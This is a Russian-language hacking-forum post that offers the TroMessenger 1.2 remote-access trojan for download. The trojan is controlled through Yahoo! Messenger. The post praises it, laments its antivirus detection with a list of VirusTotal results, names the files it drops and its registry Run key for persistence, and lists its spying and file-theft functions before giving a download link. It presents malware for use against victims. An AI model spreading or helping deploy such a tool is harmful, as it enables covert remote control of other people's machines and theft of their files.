• XSS.stack #1 – первый литературный журнал от юзеров форума

TroMessenger

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
TroMessenger 1.2
:screenshot: Скриншот|Screenshot - настройка сервера
:screenshot: Скриншот|Screenshot - как происходит "общение"
Хороший троян. Написан нашими иранскими друзьями на делфях. =) более ранние версии можно наблюдать здесь
Принцип его работы остался тем же самым, через Yahoo! Messenger.[New$paN]
к сожаленю он палиться вот результаты сканирования на вирустотал:
AntiVir 6.35.0.19 06.30.2006 BDS/Agent.XF.21
Authentium 4.93.8 06.29.2006 W32/Backdoor.KWD
Avast 4.7.844.0 06.29.2006 no virus found
AVG 386 06.29.2006 BackDoor.Agent.BHX
BitDefender 7.2 06.30.2006 Backdoor.Agent.XF
CAT-QuickHeal 8.00 06.29.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 06.29.2006 Trojan.Agent-418
DrWeb 4.33 06.30.2006 BackDoor.Devilz
eTrust-InoculateIT 23.72.53 06.30.2006 no virus found
eTrust-Vet 12.6.2283 06.30.2006 no virus found
Ewido 3.5 06.29.2006 Backdoor.Agent.xf
Fortinet 2.77.0.0 06.30.2006 W32/Packed.B!tr
F-Prot 3.16f 06.29.2006 security risk named W32/Backdoor.KWD
Ikarus 0.2.65.0 06.29.2006 BackDoor.Win32.Devilz
Kaspersky 4.0.2.24 06.30.2006 Backdoor.Win32.Agent.xf
McAfee 4796 06.29.2006 Generic packed
Microsoft 1.1481 06.29.2006 no virus found
NOD32v2 1.1633 06.29.2006 Win32/Agent.XF
Norman 5.90.21 06.29.2006 W32/Agent.ABHH
Panda 9.0.0.4 06.29.2006 Bck/Devang.C
Sophos 4.07.0 06.30.2006 Troj/Agent-BPE
Symantec 8.0 06.30.2006 no virus found
TheHacker 5.9.8.166 06.28.2006 no virus found
UNA 1.83 06.28.2006 Backdoor.Agent
VBA32 3.11.0 06.29.2006 BackDoor.Devilz
VirusBuster 4.3.7:9 06.29.2006 Backdoor.Agent.DDJ

серверная часть состоит из трёх файлов.
c:\WINDOWS\WinMsgLoader.exe
c:\WINDOWS\system32\LoginCMD.exe
c:\WINDOWS\system32\YMSG12ENCRYPT.dll
WinMsgLoader.exe - 310,272 байт
LoginCMD.exe - 6,144 байт
YMSG12ENCRYPT.dll - 46,080 байт

Для автозапуска он создаёт следующий ключ реестра:
Код:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "WinMsgLoader" 
data: C:\WINDOWS\WinMsgLoader.exe
с его помощью можно:
- просматривать файлы и папки
- Делать скриншоты
- баловаться с СД ромом
- Закачаивайть файлы на заражённый комп и запускать их
- И соответсвенно скачаивать с заражённого компа файлы на ваш компьютер
Более подробно ознакомится с его возможносятми можно скачав архив с ним.
:zns5: Скачать|Download

спасибо мр. N3x^0r'у
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх